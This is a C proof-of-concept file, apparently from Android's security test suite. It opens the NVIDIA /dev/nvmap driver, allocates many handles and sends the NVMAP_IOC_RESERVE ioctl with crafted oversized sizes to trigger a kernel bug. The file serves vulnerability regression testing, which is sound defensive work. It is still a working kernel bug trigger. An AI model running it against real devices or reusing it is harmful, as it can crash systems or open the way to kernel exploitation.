blob: b65b16c9f06ae6ab43efe4982736a69f0d869a0f [file] [log] [blame]
/*
* Copyright (C) 2017 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sched.h>
struct nvmap_handle_param {
__u32 handle; /* nvmap handle */
__u32 param; /* size/align/base/heap etc. */
unsigned long result; /* returns requested info*/
};
struct nvmap_create_handle {
union {
__u32 id; /* FromId */
__u32 size; /* CreateHandle */
__s32 fd; /* DmaBufFd or FromFd */
};
__u32 handle; /* returns nvmap handle */
};
struct nvmap_alloc_handle {
__u32 handle; /* nvmap handle */
__u32 heap_mask; /* heaps to allocate from */
__u32 flags; /* wb/wc/uc/iwb etc. */
__u32 align; /* min alignment necessary */
};
struct nvmap_cache_op_list {
__u64 handles; /* Ptr to u32 type array, holding handles */
__u64 offsets; /* Ptr to u32 type array, holding offsets
* into handle mem */
__u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
* regions within each handle */
__u32 nr; /* Number of handles */
__s32 op; /* wb/wb_inv/inv */
};
#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
/* common carveout heaps */
#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
/* allocation flags */
#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
#define NVMAP_HANDLE_SECURE (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
enum {
NVMAP_PAGES_UNRESERVE = 0,
NVMAP_PAGES_RESERVE
};
int g_fd = -1;
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
struct nvmap_create_handle* g_allocation = NULL;
struct nvmap_alloc_handle g_real_alloc = {0};
struct nvmap_cache_op_list g_op_list = {0};
#define MAX_HANDLE_NUM (1000)
int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
int open_driver() {
char* dev_path = "/dev/nvmap";
g_fd = open(dev_path, O_RDWR);
if (g_fd < 0) {
printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
} else {
printf("[*] open file(%s) succ!\n", dev_path);
}
return g_fd;
}
int trigger_nvmap_create() {
g_allocation->handle = -1;
ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
return g_allocation->handle;
}
void trigger_nvmap_alloc(int handle) {
g_real_alloc.handle = handle;
ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
}
void trigger_nvmap_free(int handle) {
ioctl(g_fd, NVMAP_IOC_FREE, handle);
printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
}
void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
setpriority(PRIO_PROCESS, gettid(), privi);
printf("[*] setpriority(%d) errno = %d\n", privi, errno);
/* bind process to a CPU*/
if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
}
}
void prepare_data() {
int i;
void* data = calloc(1, 0x1000);
g_allocation = (struct nvmap_create_handle*)data;
g_allocation->size = 0x40;
g_real_alloc.align = 0x40;
g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
for (i = 0; i < MAX_HANDLE_NUM; ++i) {
((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
}
g_op_list.nr = MAX_HANDLE_NUM;
g_op_list.op = NVMAP_PAGES_RESERVE;
}
void create_handles() {
int i;
for (i = 0; i < MAX_HANDLE_NUM; ++i) {
g_handles_for_alloc[i] = trigger_nvmap_create();
}
}
void trigger_rw_handle(int handle) {
ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
}
int main(int argc, char**argv) {
int i;
if (open_driver() < 0) {
return -1;
}
prepare_data();
create_handles();
for (i = 0; i < MAX_HANDLE_NUM; ++i) {
trigger_nvmap_alloc(g_handles_for_alloc[i]);
}
printf("[*] Begin to trigger bug....\n");
sleep(1);
for (i = 0; i < MAX_HANDLE_NUM; ++i) {
trigger_rw_handle(g_handles_for_alloc[i]);
}
return 0;
}